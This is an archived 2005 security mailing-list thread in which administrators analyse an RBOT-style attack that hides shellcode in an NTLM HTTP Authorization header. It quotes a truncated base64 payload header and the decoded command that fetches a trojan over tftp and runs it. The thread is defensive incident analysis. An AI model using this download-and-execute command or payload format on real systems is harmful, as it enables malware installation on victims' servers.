Security Incidents mailing list archives
Re: New http attack?
From: Ron <iago () valhallalegends com>
Date: Fri, 10 Jun 2005 06:26:10 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 For listening connections, yes, 0.0.0.0 binds to all interfaces; however, tftp isn't listening, it's making an outgoing connection. I eventually found one that isn't 0.0.0.0, it's an actual ip, which leads me to believe that the 0.0.0.0 ones are just broken. Alex wrote:
Isn't "-i 0.0.0.0" telling tftp to what interface to bind? 0.0.0.0 is usually a generic address that means to bind to ALL interfaces... I suppose they are just being lazy -- they already know the IP address of the server! -Alex On Thu, 9 Jun 2005, Ron wrote: Out of curiosity, I notice that when I decode any hit on my IDS with that exploit, it ends up with the following command (along with shellcode and padding, of course): cmd /c tftp -i 0.0.0.0 GET wuamkop.exe&start wuamkop.exe&exit Do you know why it would be "0.0.0.0"? Is it just failing to get the proper ip for the trojan or what? Thanks, Ron Kirby Angell wrote:- From http://isc.sans.org/diary.php?date=2005-06-03: "On a similar note, we've had one report of what looks to be like another RBOT vector, this time SMB over HTTP. An IIS server will accept multiple forms of authentication, including (non-IIS folks cover your eyes, this will hurt) NTLM via base64 encoding. You looked....I warned you! Look for: GET / HTTP/1.0 Host: xxx.xxx.xxx.xxx Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQ..... All that gibberish can be decoded with good ol' "mimencode -u" to reveal an RBOT tftp download command. The long and short of it is POLP - Principle of Least Privilege. Disable any authentication methods that are unnecessary, especially on your big-bad-world-facing servers. Me, I don't trust anyone to play nicely, inside or out." Keith T. Morgan wrote:A google search didn't turn up anything of value on this, so I'm posting to the list. If I've missed something that's common knowledge here, I appologize for inverting the signal/noise ratio a bit with this post. We've seen an attack that triggered a snort bleeding-edge hit for "smb over http authentication." This isn't particularly alarming, but, what caught my attention is what appears to be a very large buffer in part of the packet. The ascii decoded capture looks a bit like this: GET / HTTP/1.0 Host: obfuscated Authorization: Negotiate <what may be an encrypted password> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB. This "QUFB" string is repeated for 1400 bytes or so, and I'm assuming went beyond the single packet capture I have. The IIS logs indicate a simple GET / with a 401 response code. Has anyone seen this "QUFBQUFB" string in a worm, virus, or exploit floating around out there somewhere? I think chances of this being a FP are low since we're not using NTLM or windows native/ad authentication on this site. -- Keith Morgan -- CISSP, MCP, CCSE/CCSA "Hey Pants... Any advice for getting through turn 1 with 55 motorcycles on the grid?" "Yeah. Don't Crash." -- Sage motorcycle roadracing advice from Shawn (Pants) Romano ************************************************************************************************** The contents of this email and any attachments are confidential. It is intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies. ** this message has been scanned for viruses, vandals and malicious content ** **************************************************************************************************-- Thank you, Kirby Angell Get notified anytime your website goes down! http://www.alertra.com key: 9004F4C0 fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.9.15 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFCqXjSfqSf2EkP4p4RAjZHAJwNIY7xIHK+5xd5dAh4zmOcLW9lJgCePOfo QI6yEaOnr1xsQjTyyZESuic= =LIAH -----END PGP SIGNATURE-----
Current thread:
- New http attack? Keith T. Morgan (Jun 08)
- Re: New http attack? dullien (Jun 08)
- Re: New http attack? Kirby Angell (Jun 08)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Alex (Jun 10)
- Re: New http attack? Ron (Jun 10)
- Re: New http attack? Kevin Timm (Jun 10)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Tomaz Solc (Jun 08)
- <Possible follow-ups>
- Re: New http attack? Jason Falciola (Jun 08)
- Re: Re: New http attack? phil (Jun 20)
- Re: Re: New http attack? phil (Jun 20)